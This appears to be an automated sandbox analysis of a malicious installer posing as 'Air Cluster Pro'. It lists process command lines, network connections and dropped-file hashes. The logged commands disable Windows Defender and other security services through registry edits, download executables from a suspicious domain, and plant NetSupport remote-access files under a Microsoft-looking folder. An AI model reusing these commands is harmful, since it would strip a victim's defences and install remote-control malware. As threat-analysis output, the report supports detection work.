"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Get-MpPreference"

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^a')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "$wshell=New-Object -ComObject wscript.shell; $wshell.SendKeys('^c')

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe" "http://www.winfreycmh.Pw/ee/51482891?64825090f64825090=1688946376091796500=0- 4253"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe" "http://www.winfreycmh.Pw/ee/51482891?64825090g64825090==992217=992217;1" "992217;mdf7r;992217;1688946376091796500;1688946376091796500" "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\64825090"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe

dw20.exe -x -s 692

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\bsetgaf.exe" "http://www.winfreycmh.Pw/Qzgfh.exe" "992217;tq5bw;1688946376091796500" "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\Qzgfh.exe"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe" "http://www.winfreycmh.Pw/ee/51482891?64825090f64825090=1688946376091796500=-exe-0" "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\4253"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe" "http://www.winfreycmh.Pw/ee/51482891?64825090f64825090=1688946376091796500=hfhtvuhuhfhtvuhu" "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\4253"

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\Qzgfh.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\Qzgfh.exe" "mygyc.exe" "http://www.winfreycmh.Pw"

C:\Users\Admin\AppData\Local\Temp\nsk4E85.tmp\MicrosoftEdgeWebview2Setup.exe

"C:\Users\Admin\AppData\Local\Temp\nsk4E85.tmp\MicrosoftEdgeWebview2Setup.exe" /silent /install

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe

"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\mygyc.exe" "http://www.winfreycmh.Pw/ee/51482891?64825090f64825090=1688946376091796500=hfhtvuhuhfhtvuhuhfhtvuhu4" "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\4253"

C:\Program Files (x86)\Microsoft\Temp\EU4F01.tmp\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\Temp\EU4F01.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver

C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.175.27\MicrosoftEdgeUpdateComRegisterShell64.exe"

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzUuMjciIHNoZWxsX3ZlcnNpb249IjEuMy4xNzUuMjciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7N0M0QkEwOTctMEMyMi00RUI3LUI5NTYtQ0UwRDc3QzFBMThBfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntBMjQ1OUYwMS1CNTUwLTQyNzEtOEI2OS00MzQyQzExMTMwN0Z9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iNCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIiIG5leHR2ZXJzaW9uPSIxLjMuMTc1LjI3IiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1OTI4MjE5NTY2IiBpbnN0YWxsX3RpbWVfbXM9IjEyNDciLz48L2FwcD48L3JlcXVlc3Q-

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{7C4BA097-0C22-4EB7-B956-CE0D77C1A18A}" /silent

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNzUuMjciIHNoZWxsX3ZlcnNpb249IjEuMy4xNzUuMjciIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7N0M0QkEwOTctMEMyMi00RUI3LUI5NTYtQ0UwRDc3QzFBMThBfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9IntGNjdFNTU5Qi02RDRCLTQzQjUtQjQ1Qi04NTQ3NTkwMkIxMTl9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iNCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE1MDYzLjAiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iREFEWSIgcHJvZHVjdF9uYW1lPSJTdGFuZGFyZCBQQyAoUTM1ICsgSUNIOSwgMjAwOSkiLz48ZXhwIGV0YWc9IiIvPjxhcHAgYXBwaWQ9Ins4QTY5RDM0NS1ENTY0LTQ2M2MtQUZGMS1BNjlEOUU1MzBGOTZ9IiB2ZXJzaW9uPSIxMDYuMC41MjQ5LjExOSIgbmV4dHZlcnNpb249IjEwNi4wLjUyNDkuMTE5IiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIzMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMyIgc3lzdGVtX3VwdGltZV90aWNrcz0iNTkzMzYwOTgxNyIvPjwvYXBwPjwvcmVxdWVzdD4

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B7F15F74-2566-4F68-8F8E-3A1945F45FD1}\MicrosoftEdge_X64_114.0.1823.67.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B7F15F74-2566-4F68-8F8E-3A1945F45FD1}\MicrosoftEdge_X64_114.0.1823.67.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level

C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B7F15F74-2566-4F68-8F8E-3A1945F45FD1}\EDGEMITMP_3D23D.tmp\setup.exe

"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B7F15F74-2566-4F68-8F8E-3A1945F45FD1}\EDGEMITMP_3D23D.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{B7F15F74-2566-4F68-8F8E-3A1945F45FD1}\MicrosoftEdge_X64_114.0.1823.67.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level

Network

Country Destination Domain Proto
US 8.8.8.8:53 yearcoal.online udp
US 172.67.220.175:80 yearcoal.online tcp
US 8.8.8.8:53 geesemonth.xyz udp
US 172.67.149.68:80 geesemonth.xyz tcp
US 8.8.8.8:53 175.220.67.172.in-addr.arpa udp
US 8.8.8.8:53 68.149.67.172.in-addr.arpa udp
US 8.8.8.8:53 www.cobaltshoesx.com udp
US 149.102.225.29:443 www.cobaltshoesx.com tcp
US 8.8.8.8:53 29.225.102.149.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 142.33.222.23.in-addr.arpa udp
US 8.8.8.8:53 83.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 koppertrain.top udp
DE 45.15.157.190:1203 koppertrain.top tcp
US 8.8.8.8:53 str.skymiddle.host udp
US 188.114.96.0:80 str.skymiddle.host tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
GB 51.142.119.24:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 act.reactionharbor.xyz udp
US 188.114.96.0:80 act.reactionharbor.xyz tcp
US 8.8.8.8:53 190.157.15.45.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 24.119.142.51.in-addr.arpa udp
US 8.8.8.8:53 www.mildstat.com udp
GB 23.106.59.52:80 www.mildstat.com tcp
US 8.8.8.8:53 www.mminnn.com udp
GB 23.106.59.45:80 www.mminnn.com tcp
US 8.8.8.8:53 52.59.106.23.in-addr.arpa udp
US 8.8.8.8:53 45.59.106.23.in-addr.arpa udp
US 8.8.8.8:53 axsboe-campaign.com udp
US 172.67.213.153:443 axsboe-campaign.com tcp
US 172.67.213.153:443 axsboe-campaign.com tcp
US 8.8.8.8:53 153.213.67.172.in-addr.arpa udp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
NL 95.101.74.134:443 www.bing.com tcp
NL 95.101.74.134:443 www.bing.com tcp
US 8.8.8.8:53 r.bing.com udp
NL 95.101.74.134:443 r.bing.com tcp
NL 95.101.74.134:443 r.bing.com tcp
US 8.8.8.8:53 134.74.101.95.in-addr.arpa udp
NL 95.101.74.134:443 r.bing.com tcp
NL 95.101.74.134:443 r.bing.com tcp
US 8.8.8.8:53 login.microsoftonline.com udp
NL 40.126.32.76:443 login.microsoftonline.com tcp
NL 40.126.32.76:443 login.microsoftonline.com tcp
US 204.79.197.200:443 www2.bing.com tcp
US 8.8.8.8:53 th.bing.com udp
NL 95.101.74.134:443 th.bing.com tcp
NL 95.101.74.134:443 th.bing.com tcp
NL 95.101.74.134:443 th.bing.com tcp
NL 95.101.74.134:443 th.bing.com tcp
NL 95.101.74.134:443 th.bing.com tcp
NL 95.101.74.134:443 th.bing.com tcp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
DE 88.221.169.152:443 www.microsoft.com tcp
DE 88.221.169.152:443 www.microsoft.com tcp
US 8.8.8.8:53 152.169.221.88.in-addr.arpa udp
US 8.8.8.8:53 200.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 www.msn.com udp
US 204.79.197.203:443 www.msn.com tcp
US 204.79.197.203:443 www.msn.com tcp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 13.107.246.67:443 edgestatic.azureedge.net tcp
US 13.107.246.67:443 edgestatic.azureedge.net tcp
US 13.107.246.67:443 edgestatic.azureedge.net tcp
US 13.107.246.67:443 edgestatic.azureedge.net tcp
US 13.107.246.67:443 edgestatic.azureedge.net tcp
US 13.107.246.67:443 edgestatic.azureedge.net tcp
US 8.8.8.8:53 67.246.107.13.in-addr.arpa udp
US 8.8.8.8:53 assets.msn.com udp
GB 95.101.143.155:443 assets.msn.com tcp
GB 95.101.143.155:443 assets.msn.com tcp
GB 95.101.143.155:443 assets.msn.com tcp
GB 95.101.143.155:443 assets.msn.com tcp
US 8.8.8.8:53 155.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 63.13.109.52.in-addr.arpa udp
US 8.8.8.8:53 www.winfreycmh.pw udp
GB 23.106.59.48:80 www.winfreycmh.pw tcp
US 8.8.8.8:53 77.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 48.59.106.23.in-addr.arpa udp
GB 23.106.59.48:80 www.winfreycmh.pw tcp
GB 23.106.59.48:80 www.winfreycmh.pw tcp
GB 23.106.59.48:80 www.winfreycmh.pw tcp
GB 23.106.59.48:80 www.winfreycmh.pw tcp
US 8.8.8.8:53 209.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 msedge.api.cdp.microsoft.com udp
US 20.114.58.89:443 msedge.api.cdp.microsoft.com tcp
US 8.8.8.8:53 89.58.114.20.in-addr.arpa udp
US 8.8.8.8:53 msedge.f.tlu.dl.delivery.mp.microsoft.com udp
NL 178.79.208.1:80 msedge.f.tlu.dl.delivery.mp.microsoft.com tcp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp

Files

memory/4624-117-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp

MD5 c1186d360e7b3db56757bc78a428f486
SHA1 2018c76fa571ce86c8beddc70589aab0a380e3e4
SHA256 999b0adc768a8a974e04fa9fe6c44abf026b0847ba1926b2513236ef90334ab5
SHA512 af2e6084f25ca2745421f227868f214d5e12c3ee23f7ee52d35b57705d1b7c3adb5863549738e673288b7fd5ac959a6e47f52f7397af374fa8a04080cfc9e502

memory/4220-123-0x0000000000880000-0x0000000000881000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-83S92.tmp\Air Cluster Pro 130.tmp

MD5 c1186d360e7b3db56757bc78a428f486
SHA1 2018c76fa571ce86c8beddc70589aab0a380e3e4
SHA256 999b0adc768a8a974e04fa9fe6c44abf026b0847ba1926b2513236ef90334ab5
SHA512 af2e6084f25ca2745421f227868f214d5e12c3ee23f7ee52d35b57705d1b7c3adb5863549738e673288b7fd5ac959a6e47f52f7397af374fa8a04080cfc9e502

C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe

MD5 1f9ae83f27ee5f9ab56ee579acde7058
SHA1 1c643006c709a17ebc18b17302c03d4c1df81f71
SHA256 777bd6a701233ece4dc1166f229888d4d7aafbff73c5b2d7852d42e92b291a7f
SHA512 ddf6fb75b30878f75624217abc7945b9331e598aee62709f92fff569b571427424d448d0f3ac222a6c737a0a6859b299e9c519feb6e99956818a37f908143097

C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe

MD5 1f9ae83f27ee5f9ab56ee579acde7058
SHA1 1c643006c709a17ebc18b17302c03d4c1df81f71
SHA256 777bd6a701233ece4dc1166f229888d4d7aafbff73c5b2d7852d42e92b291a7f
SHA512 ddf6fb75b30878f75624217abc7945b9331e598aee62709f92fff569b571427424d448d0f3ac222a6c737a0a6859b299e9c519feb6e99956818a37f908143097

C:\Users\Admin\AppData\Local\Temp\is-3MJTR.tmp\setup.exe

MD5 1f9ae83f27ee5f9ab56ee579acde7058
SHA1 1c643006c709a17ebc18b17302c03d4c1df81f71
SHA256 777bd6a701233ece4dc1166f229888d4d7aafbff73c5b2d7852d42e92b291a7f
SHA512 ddf6fb75b30878f75624217abc7945b9331e598aee62709f92fff569b571427424d448d0f3ac222a6c737a0a6859b299e9c519feb6e99956818a37f908143097

memory/4372-145-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-VJS8O.tmp\setup.tmp

MD5 f8a2f4a300c0655e6681f5b6b3a20c27
SHA1 e8a3971dca03c4be5cf483fcef04b14a32d22eba
SHA256 09413d7208f0b830bb7e7e4f8d421e6ca83c5336b7abfc8428e8ba756e87be22
SHA512 db7b946804f46e0dc03db2aa5c259caf893758f47dd5e7c2a6320081b3f52b44d6714fcfadc08f40f8f269cd0c5d458aaca7f35d1fb4e843b6424acf921f859c

memory/4624-150-0x0000000000400000-0x00000000004D8000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-I5072.tmp\_isetup\_isdecmp.dll

MD5 077cb4461a2767383b317eb0c50f5f13
SHA1 584e64f1d162398b7f377ce55a6b5740379c4282
SHA256 8287d0e287a66ee78537c8d1d98e426562b95c50f569b92cea9ce36a9fa57e64
SHA512 b1fcb0265697561ef497e6a60fcee99dc5ea0cf02b4010da9f5ed93bce88bdfea6bfe823a017487b8059158464ea29636aad8e5f9dd1e8b8a1b6eaaab670e547

memory/4220-153-0x0000000000400000-0x000000000071C000-memory.dmp

memory/4204-162-0x0000000000950000-0x0000000000951000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-I5072.tmp\_isetup\_isdecmp.dll

MD5 077cb4461a2767383b317eb0c50f5f13
SHA1 584e64f1d162398b7f377ce55a6b5740379c4282
SHA256 8287d0e287a66ee78537c8d1d98e426562b95c50f569b92cea9ce36a9fa57e64
SHA512 b1fcb0265697561ef497e6a60fcee99dc5ea0cf02b4010da9f5ed93bce88bdfea6bfe823a017487b8059158464ea29636aad8e5f9dd1e8b8a1b6eaaab670e547

\Users\Admin\AppData\Local\Temp\is-I5072.tmp\idp.dll

MD5 55c310c0319260d798757557ab3bf636
SHA1 0892eb7ed31d8bb20a56c6835990749011a2d8de
SHA256 54e7e0ad32a22b775131a6288f083ed3286a9a436941377fc20f85dd9ad983ed
SHA512 e0082109737097658677d7963cbf28d412dca3fa8f5812c2567e53849336ce45ebae2c0430df74bfe16c0f3eebb46961bc1a10f32ca7947692a900162128ae57

memory/4372-172-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/4204-174-0x0000000000400000-0x000000000071C000-memory.dmp

memory/4204-175-0x0000000000950000-0x0000000000951000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe

MD5 52742e7ca3ab70176f9e7797be655e1f
SHA1 46240ce20582f88513bf1fc86db6a749d97cb75d
SHA256 4ec6ccb79b66699a67b7df4275f4abc87421a2e1a75b15f528ed9964aa5fffb4
SHA512 41e77621d8f2911b316ce27636dc2ddf509f98ad3a17a60258e36599613131b20068050dcdc02c072a3d4d08ffb3396d6ae50aca2034c21dfc35db5bd825541d

memory/4192-179-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-I5072.tmp\s0.exe

MD5 52742e7ca3ab70176f9e7797be655e1f
SHA1 46240ce20582f88513bf1fc86db6a749d97cb75d
SHA256 4ec6ccb79b66699a67b7df4275f4abc87421a2e1a75b15f528ed9964aa5fffb4
SHA512 41e77621d8f2911b316ce27636dc2ddf509f98ad3a17a60258e36599613131b20068050dcdc02c072a3d4d08ffb3396d6ae50aca2034c21dfc35db5bd825541d

C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp

MD5 35641ce29349e4ff8019362c2f1a6713
SHA1 4bde30eb8814b07ae39ad72516071b1abc9e4f70
SHA256 b09afb08306f1e125e35d0224ec3e33be32d6efc9691fe0803e9fdd87d440b83
SHA512 0c13469f714e7511f5f4f2cbca39e614ac65e8077683ed5a67153e81a02d9d7768e696981881f31ca02c23db9e961c0fe64ad1e01630a1ffb4f360bffd3915a2

memory/1036-186-0x0000000000990000-0x0000000000991000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-V1SDH.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/4204-193-0x0000000000400000-0x000000000071C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-D3BNR.tmp\s0.tmp

MD5 35641ce29349e4ff8019362c2f1a6713
SHA1 4bde30eb8814b07ae39ad72516071b1abc9e4f70
SHA256 b09afb08306f1e125e35d0224ec3e33be32d6efc9691fe0803e9fdd87d440b83
SHA512 0c13469f714e7511f5f4f2cbca39e614ac65e8077683ed5a67153e81a02d9d7768e696981881f31ca02c23db9e961c0fe64ad1e01630a1ffb4f360bffd3915a2

\??\c:\users\admin\appdata\local\temp\is-v1sdh.tmp\{app}\cvysapfvmvsjevb.cab

MD5 311b9064d72279593f2e540468d02928
SHA1 3b48b75468fd479c618d94a1a9af4b30cfbc19f0
SHA256 43d5335af9a54cfec3bb22ab903066ee1415b85d8668975ffdb4e4e06962fd91
SHA512 054bd0d323dac576d8831e9049c695bca5b052ec33f03122995e0287fc9cf4b7547d794eca5214db11e8bc8582d27931d68e1bd7edfcaeee4fa161d23a130486

C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe

MD5 c0eb3eac96511077dafc0afa64c6388c
SHA1 33e81f25493eda3bbf0b7cdcddd523547fa6c31e
SHA256 eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a
SHA512 2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc

C:\ProgramData\regid.1993-06.com.microsoft\PCICL32.dll

MD5 d3d39180e85700f72aaae25e40c125ff
SHA1 f3404ef6322f5c6e7862b507d05b8f4b7f1c7d15
SHA256 38684adb2183bf320eb308a96cdbde8d1d56740166c3e2596161f42a40fa32d5
SHA512 471ac150e93a182d135e5483d6b1492f08a49f5ccab420732b87210f2188be1577ceaaee4ce162a7acceff5c17cdd08dc51b1904228275f6bbde18022ec79d2f

C:\ProgramData\regid.1993-06.com.microsoft\wmiprvse.exe

MD5 c0eb3eac96511077dafc0afa64c6388c
SHA1 33e81f25493eda3bbf0b7cdcddd523547fa6c31e
SHA256 eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a
SHA512 2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc

\ProgramData\regid.1993-06.com.microsoft\pcicapi.dll

MD5 34dfb87e4200d852d1fb45dc48f93cfc
SHA1 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641
SHA256 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703
SHA512 f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

C:\ProgramData\regid.1993-06.com.microsoft\pcicapi.dll

MD5 34dfb87e4200d852d1fb45dc48f93cfc
SHA1 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641
SHA256 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703
SHA512 f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

C:\ProgramData\regid.1993-06.com.microsoft\MSVCR100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

\ProgramData\regid.1993-06.com.microsoft\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

\ProgramData\regid.1993-06.com.microsoft\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
